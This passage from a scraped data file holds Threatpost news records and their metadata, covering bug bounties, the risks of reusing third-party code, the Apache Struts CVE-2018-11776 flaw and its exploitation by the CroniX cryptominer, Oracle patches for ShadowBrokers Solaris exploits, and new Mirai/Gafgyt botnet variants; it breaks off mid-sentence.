A self-contained community hammers away at applications on these respective platforms and earns bounties for bugs that meet certain criteria.\n\nGitHub\u2019s Toews pointed out one of GitHub\u2019s top bug submitters, Aleksandr Dobkin, who found a troubling cross-site scripting flaw that, when combined with a zero day in Google\u2019s Chrome browser, achieved a bypass of GitHub\u2019s content security policy.\n\nGitHub maintains a [leaderboard](<https://bounty.github.com/index.html>) of its top bug hunters. The system requires that researchers who find vulnerabilities in a GitHub property not disclose them before a patch has been released and implemented. Researchers are also not allowed to use automated scanners against GitHub, or access another user\u2019s account as part of the program.\n\nToews said vulnerabilities can be submitted [here](<https://bounty.github.com/submit-a-vulnerability.html>), and should also be accompanied by proper documentation that will allow GitHub to reproduce the vulnerability.\n", "cvss3": {}, "published": "2015-01-29T11:21:40", "type": "threatpost", "title": "GitHub Doubles Maximum Bug Bounty Payouts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-30T20:11:49", "id": "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "href": "https://threatpost.com/github-doubles-down-on-maximum-bug-bounty-payouts/110730/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:19", "description": "The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. 
It\u2019s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off approach with the code they host.\n\nThis scenario allows attackers to target one overlooked component flaw used in millions of applications instead of focusing on a single application security vulnerability. The real-world consequences have been demonstrated in the past few years with the [Heartbleed](<https://threatpost.com/openssl-fixes-tls-vulnerability/105300/>) vulnerability in OpenSSL, [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) in GNU Bash, and a deserialization vulnerability exploited in a recent high-profile attack against the [San Francisco Municipal Transportation Agency](<https://threatpost.com/hackers-make-new-claim-in-san-francisco-transit-ransomware-attack/122138/>). These are three instances where developers reused libraries and frameworks that contain unpatched flaws in production applications.\n\nSecurity researchers at Veracode estimate that 97 percent of the Java applications the company tested included at least one component with at least one known software vulnerability. \u201cThe problem isn\u2019t limited to Java and isn\u2019t just tied to obscure projects,\u201d said Tim Jarrett, senior director of security at Veracode. \u201cPick your programming language.\u201d Gartner, meanwhile, estimates that by 2020, [99 percent of vulnerabilities](<http://www.gartner.com/smarterwithgartner/top-10-security-predictions-2016/>) exploited will be ones known by security and IT professionals for at least one year.\n\n**Code Reuse Saves Time, Invites Bugs**\n\nAccording to security experts, the problem is two-fold. On one hand, developers use reliable code that at a later date is found to have a vulnerability. 
On the other hand, insecure code is used by a developer who doesn\u2019t exercise due diligence on the software libraries used in their project.\n\n\u201cThey\u2019ve heard the warnings and know the dangers, but for many developers open source and third-party components can be a double-edged sword \u2013 saving time but opening the door to bugs,\u201d said Derek Weeks, vice president and DevOps advocate at Sonatype.\n\nIn an analysis of 25,000 applications, Sonatype found that seven percent of components had at least one security defect tied to the use of an insecure software component.\n\nRepositories such as GitHub, Bitbucket, Python Package Index and NuGet Gallery are essential tools helping developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Java application developers, for example, rely on pre-existing frameworks to handle encryption, visual elements and libraries for handling data.\n\n\u201cSoftware is no longer written from scratch,\u201d Weeks said. \u201cNo matter how new and unique the application, 80 percent of the code used in a software application relies on third-party libraries or components.\u201d\n\nHe said enterprises are more reliant on the software supply chain than ever before. But he says many of the go-to open-source repositories that make up that supply chain are not vetted libraries of reliable code. Rather, they are warehouses with a varying percentage of outdated projects with security issues.\n\nAccording to an analysis of Sonatype\u2019s own Central Repository in 2015, developers had made 31 billion download requests of open source and third-party software components, compared to 17 billion requests the year before. 
And when Sonatype analyzed its own code library, it found 6.1 percent of code downloaded from its Central Repository had a known security defect.\n\nWeeks says Sonatype is doing better than other repositories that offer no tools, no guidance and no red flags to prevent developers from using frameworks with faulty code. \u201cThere is no Good Housekeeping Seal of Approval for third-party code.\u201d\n\n\u201cFaulty code can easily spawn more problems down the road for developers,\u201d said Stephen Breen, a principal consultant at NTT Com Security. \u201cEven when development teams have the best intentions, it\u2019s easy for developers working under tight deadlines to not properly vet the third-party code used in their software.\u201d\n\nBreen said when insecure code is unknowingly used to build a component within a software program, problems snowball when that component is used inside other larger components. One example of vulnerable third-party code reused repeatedly is a deserialization flaw in Apache Commons Collections (commons-collections-3.2.1.jar) \u2013 first reported in 2015 and patched in November of the same year.\n\nSource: Veracode\n\nJarrett found there are still 1,300 instances of the old vulnerable version of Commons Collections lurking inside Java applications using Spring and Hibernate libraries and hosted across multiple open source code repositories.\n\n\u201cThe developer knows they are picking Spring or Hibernate for their development project. They don\u2019t take it to the next level and realize they are also getting Common Collections,\u201d Jarrett said. 
\u201cThat Common Collections library is then used by thousands more projects.\u201d\n\nAccording to Veracode, Apache Commons Collections is the sixth-most common component used in Java applications. It found that unpatched versions of the software were in 25 percent of 300,000 Java applications scanned. Even more challenging for developers is updating applications that are still using vulnerable versions of libraries and frameworks after the flaws have been patched.\n\n\u201cThink of it like a faulty airbag. Carmakers used those faulty airbags in millions of vehicles. Now it\u2019s the carmaker on the hook to fix the problem, not the airbag maker,\u201d Jarrett said.\n\n**Leaky Apps, Bad Crypto, Injection Flaws Galore**\n\nVeracode said the Apache Commons Collections example is the tip of the iceberg. When Veracode examined vulnerabilities tied to insecure code it found application information leakage, where user or application data can be leveraged by an attacker, is the most prevalent type of vulnerability, accounting for 72 percent of third-party code flaws. Second are cryptographic issues, representing 65 percent of vulnerabilities. That was followed by Carriage Return Line Feed (CRLF) injection flaws and cross-site scripting bugs.\n\nSource: Veracode\n\nCompounding the problem is an increased dependency on open-source components used in a wide variety of software products. The federal government is typical. It has an open-source-first policy as do many private companies. 
Relying on third-party libraries shortens development time and can improve the safety and quality of software projects, Weeks said.\n\n\u201cNot only does code reuse save time but it also allows developers to be more innovative as they focus on creating new functionality and not writing encryption libraries from scratch,\u201d Weeks said. Done correctly, code reuse is a developer\u2019s godsend, he said.\n\nFor those reasons, security experts say it\u2019s time for the industry to stop and consider where code originates. Sonatype, which markets and sells code verification services, promotes the idea of documenting software\u2019s supply chain with what it calls a \u201csoftware bill of materials.\u201d That way developers can better scrutinize open-source frameworks before and after they are used, making it easier to update those applications that are using vulnerable old versions of libraries.\n\nSonatype said it found one in 16 components it analyzed had a vulnerability that was previously documented, verified and with additional information available on the Internet. \u201cI can\u2019t imagine any other industry where it\u2019s okay that one in 16 parts have known defects.\u201d\n\nThe problem is that among developers there is a mix of denial and ignorance at play. \u201cDevelopers choose component parts, not security,\u201d Weeks said. It should be the other way around.\n\n\u201cIf we are aware of malicious or bad libraries or code, of course we want to warn our users,\u201d said Logan Abbott, president of SourceForge, a software and code repository. \u201cWe scan binaries for vulnerabilities, but we don\u2019t police any of the code we host.\u201d\n\n**Repositories Say: \u2018We\u2019re Just the Host\u2019**\n\nRepositories contacted by Threatpost say their platforms are a resource for developers akin to cloud storage services that allow people to store and share content publicly or privately. 
They don\u2019t tell users what they can and cannot host with their service.\n\nThey say rooting out bugs in software should be on the shoulders of developers \u2013 not repositories. Writing good, vulnerability-free code starts with getting good code from healthy repositories with engaged users.\n\n\u201cBitbucket is to a developer like Home Depot is to a carpenter,\u201d said Rahul Chhabria, product manager for Atlassian Bitbucket. \u201cWe\u2019ve built a hosting service with a variety of tools to help developers execute on their vision.\u201d\n\nChhabria said Bitbucket offers a range of tools to help sniff out bad or insecure components, such as the third-party tool SourceClear for scanning dependency chains. It also offers features that it says allow for team development of software projects and simplify peer review. Another feature, Bitbucket Pipelines, is also designed to help developers ship high-quality code.\n\nGitHub is one of the largest repositories; it hosts 49 million public and private projects for its 18 million users. It does not scan or red-flag insecure code hosted on its platform, according to Shawn Davenport, VP of security at GitHub. Instead, developers can use third-party tools such as Gemnasium, Brakeman and Code Climate for static and dependency analysis.\n\n\u201cThere is a lot of hidden risk out there in projects,\u201d Davenport said. \u201cWe do our best to make sure our developers know what tools are available to them to vet their own code.\u201d He estimates that a minority of GitHub developers take advantage of software scanning and auditing tools. 
\u201cUnfortunately security isn\u2019t a developer\u2019s first priority.\u201d\n\nOther repositories told Threatpost they intentionally take a hands-off approach and say expecting them to police the software they host isn\u2019t feasible, is not part of their mission and is nothing they plan to do. They point out that, flawed or not, developers want access to all code \u2013 even older components.\n\n\u201cAn implementation of a library in one framework might not be a security risk at all,\u201d Breen said. He points out that developers often temporarily revert to those old libraries as stopgaps should an updated version break a project.\n\n**Automated Scanning to the Rescue?**\n\nOne attempt at nipping the problem in the bud is the use of automated security vulnerability and configuration scanning for open-source components. By 2019, more than 70 percent of enterprise DevOps initiatives will incorporate automated scanning, according to Gartner. Today only 10 percent of packages are scanned.\n\nThe Node.js Foundation, an industry consortium designed to promote the Node.js platform, relies on a more community-based approach via the Node.js Security Project. The goal is to provide developers with a process for discovering and disclosing security vulnerabilities found in the Node.js module ecosystem. According to Node.js, the approach is a hybrid solution that consists of a database of vulnerabilities and a community communication channel for vetting and disclosing vulnerable code.\n\n\u201cIt\u2019s not a story about security professionals solving the problem, it\u2019s about how we empower development with the right information about the (software) parts they are consuming,\u201d Weeks said. 
\u201cIn this case, the heart of the solution lies with development, and therefore requires a new approach and different thinking.\u201d\n", "cvss3": {}, "published": "2016-12-15T10:00:39", "type": "threatpost", "title": "Code Reuse a Peril for Secure Software Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-12-27T13:45:57", "id": "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "href": "https://threatpost.com/code-reuse-a-peril-for-secure-software-development/122476/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-06-28T05:48:46", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. 
They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulnerability (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is because it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. 
CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and the postback result, which renders the current request parameters as a form that immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. 
If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. 
\u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as it\u2019s unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. 
It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "cvss3": {}, "published": "2018-08-23T16:46:57", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. 
It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. 
The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. 
There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. 
A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and XHide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on GitHub and Twitter just days after the latest flaw was publicized. 
Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw that it downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. 
In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted from the system.\n\nCroniX is also competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. 
Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed to be registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. 
\u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:51:10", "description": "Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday ](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>)post.\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 
7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack.\n\nThough a patch has been available for over a year now, many consumers may not have updated their systems \u2013 an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August \u2014 an IP address hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently 
